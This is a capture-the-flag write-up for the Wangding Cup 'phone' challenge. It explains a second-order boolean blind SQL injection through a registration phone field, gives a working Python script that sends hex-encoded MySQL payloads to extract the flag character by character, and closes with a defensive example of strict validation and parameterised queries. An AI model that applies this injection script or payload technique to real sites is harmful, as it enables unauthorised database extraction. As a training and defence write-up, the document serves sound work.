After registering, you can click through to see whose phone number is similar to yours.
Registration has three required fields: username, password and phone, and the phone must be numeric.
After registering with the phone number 1111 and clicking the link, the page reports that 1 person has a phone similar to mine; registering a second account with 1111, it reports 2 people. So the page queries the database with the stored phone number and returns only a count.
That gives a boolean blind-injection approach: enter the phone at registration as a hexadecimal (0x...) literal, so the "numeric" field accepts it and the decoded string is carried into the later query.
The Python script is as follows:
```python
# coding=utf-8
import binascii
import re

import requests


def login_sqli(url, username, password, payload):
    """Register a fresh account whose phone field carries the payload, then
    fetch query.php, whose response contains the count of "similar" phones."""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'
    }
    data = {
        'username': username,
        'password': password,
        'phone': payload,
        'register': 'Login',
    }
    try:
        # get a session cookie first
        s = requests.session()
        s.get(url + '/index.php', headers=headers)
        # register: the hex literal is stored as this account's phone number
        s.post(url + '/register.php', data=data, headers=headers)
        # the lookup page runs the stored phone through the query
        req3 = s.get(url + '/query.php', headers=headers)
        return req3.text
    except requests.RequestException:
        print('Error')
        return ''


if __name__ == '__main__':
    login_url = 'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com'
    password = '123123'
    # the count of matching phones is the only number in the response
    pattern = re.compile(r'\d?\d?\d?\d?\d?\d')
    for i in range(1, 43):
        for j in range(33, 128):
            # boolean condition on the i-th character of the flag; '%%' becomes a literal '%'
            payload = "5555%%' and ord(mid((select * from flag),%d,1))=%d #" % (i, j)
            # send it as a MySQL hex literal so the numeric phone field accepts it
            _payload = '0x' + binascii.b2a_hex(payload.encode()).decode()
            # every attempt needs a new account
            username = 'userrif' + str(i) + str(j)
            text = login_sqli(login_url, username, password, _payload)
            # time.sleep(3)
            r = re.search(pattern, text)
            if r and int(r.group()) > 0:
                print(str(i) + '-->' + chr(j))
```
Result:
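The fix on the server side is the mirror image of the flaw described above. The following is an added example, not code from the challenge or the writeup, and it assumes a simplified model of the backend (a users table with a phone column and a "similar phone" count query): the phone is validated with a digits-only regex rather than a loose "looks numeric" test, so a 0x... literal or a quoted payload is rejected at registration, and the later lookup binds the stored value as a parameter so it can never become SQL.

```python
import re
import sqlite3

# digits only: no sign, no whitespace, no 0x prefix (a hex literal is not a phone number)
PHONE_RE = re.compile(r"\d{1,20}")


def is_valid_phone(value: str) -> bool:
    """Strict allow-list check; fullmatch so a trailing payload cannot ride along."""
    return PHONE_RE.fullmatch(value) is not None


def build_db() -> sqlite3.Connection:
    # constructed in-memory stand-in for the challenge's users table (assumed schema)
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, phone TEXT)")
    return db


def register(db: sqlite3.Connection, username: str, phone: str) -> bool:
    """Store the account only if the phone passes the allow-list; parameters keep it as data."""
    if not is_valid_phone(phone):
        return False
    db.execute("INSERT INTO users (username, phone) VALUES (?, ?)", (username, phone))
    return True


def similar_phone_count(db: sqlite3.Connection, phone: str) -> int:
    """Count phones sharing the given prefix. The value is re-validated on read as well,
    and the LIKE pattern is built in Python and bound, never concatenated into the SQL."""
    if not is_valid_phone(phone):
        return 0
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE phone LIKE ?", (phone + "%",)
    ).fetchone()
    return row[0]
```

With the loose check replaced by the allow-list, the hex trick from the writeup is stopped at registration, and even a value that slipped through would reach the query only as a bound parameter.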
Wangding Cup (網鼎杯) challenge "phone": hexadecimal MySQL injection